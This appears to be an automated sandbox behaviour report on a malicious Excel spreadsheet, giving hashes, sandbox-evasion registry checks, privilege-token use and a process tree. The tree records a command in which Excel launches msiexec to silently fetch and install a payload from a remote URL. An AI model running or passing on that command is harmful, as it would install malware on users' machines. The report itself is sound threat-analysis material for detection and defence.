Analysis
-
max time kernel
46s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
07-09-2024 21:20
Behavioral task
behavioral1
Sample
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls
Resource
win10v2004-20240802-en
General
-
Target
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls
-
Size
82KB
-
MD5
df10732c7400e5555e4f0e37fe8fbdc1
-
SHA1
4bc9edf343c7021087046021aed2eebbe1cb6ae3
-
SHA256
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b
-
SHA512
6334acc65489fdc107a8e28063ebadcf74bb710516fa70031b4bc0e846462d77bfbdb2dcc12a0ae72cd234369e1a7d27aac12123f01e931f4194072218b78fcb
-
SSDEEP
1536:oKpb8rGYrMPelwhKmFV5xtezEsgrdgrebDG7XE8rMxLgb4JSt1mGJfFacueBkgVV:oKpb8rGYrMPelwhKmFV5xtezEsgrdgw2
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
msiexec.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3944 3980 msiexec.exe EXCEL.EXE -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 3944 msiexec.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3980 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 3944 msiexec.exe Token: SeIncreaseQuotaPrivilege 3944 msiexec.exe Token: SeSecurityPrivilege 5064 msiexec.exe Token: SeCreateTokenPrivilege 3944 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3944 msiexec.exe Token: SeLockMemoryPrivilege 3944 msiexec.exe Token: SeIncreaseQuotaPrivilege 3944 msiexec.exe Token: SeMachineAccountPrivilege 3944 msiexec.exe Token: SeTcbPrivilege 3944 msiexec.exe Token: SeSecurityPrivilege 3944 msiexec.exe Token: SeTakeOwnershipPrivilege 3944 msiexec.exe Token: SeLoadDriverPrivilege 3944 msiexec.exe Token: SeSystemProfilePrivilege 3944 msiexec.exe Token: SeSystemtimePrivilege 3944 msiexec.exe Token: SeProfSingleProcessPrivilege 3944 msiexec.exe Token: SeIncBasePriorityPrivilege 3944 msiexec.exe Token: SeCreatePagefilePrivilege 3944 msiexec.exe Token: SeCreatePermanentPrivilege 3944 msiexec.exe Token: SeBackupPrivilege 3944 msiexec.exe Token: SeRestorePrivilege 3944 msiexec.exe Token: SeShutdownPrivilege 3944 msiexec.exe Token: SeDebugPrivilege 3944 msiexec.exe Token: SeAuditPrivilege 3944 msiexec.exe Token: SeSystemEnvironmentPrivilege 3944 msiexec.exe Token: SeChangeNotifyPrivilege 3944 msiexec.exe Token: SeRemoteShutdownPrivilege 3944 msiexec.exe Token: SeUndockPrivilege 3944 msiexec.exe Token: SeSyncAgentPrivilege 3944 msiexec.exe Token: SeEnableDelegationPrivilege 3944 msiexec.exe Token: SeManageVolumePrivilege 3944 msiexec.exe Token: SeImpersonatePrivilege 3944 msiexec.exe Token: SeCreateGlobalPrivilege 3944 msiexec.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3980 EXCEL.EXE 3980 EXCEL.EXE 3980 EXCEL.EXE 3980 EXCEL.EXE 3980 EXCEL.EXE 3980 EXCEL.EXE 3980 EXCEL.EXE 3980 EXCEL.EXE 3980 EXCEL.EXE 3980 EXCEL.EXE 3980 EXCEL.EXE 3980 EXCEL.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
EXCEL.EXEdescription pid process target process PID 3980 wrote to memory of 3944 3980 EXCEL.EXE msiexec.exe PID 3980 wrote to memory of 3944 3980 EXCEL.EXE msiexec.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\SYSTEM32\msiexec.exemsiexec.exe RESTART=1 /i http://zonaykan.com/lsadat2 /q ADRESS=TEMP2⤵
- Process spawned unexpected child process
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5064
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5dbf73059ab2b7042159f2bbed9c864cc
SHA1b6bf717b7bca85b9634069fa8f73ab8336a647d2
SHA256211e6673a047cbd6c403b466339311c41094ceb37a1558d2a55d6e44b58e5480
SHA51277248727406bfcdc1e6ef878212a82a559ead5860f32ebd3e6c2bc231165658d42b882a1f36f3e08e48e03f432b2dd9374d098477c8634d2291236a42a558965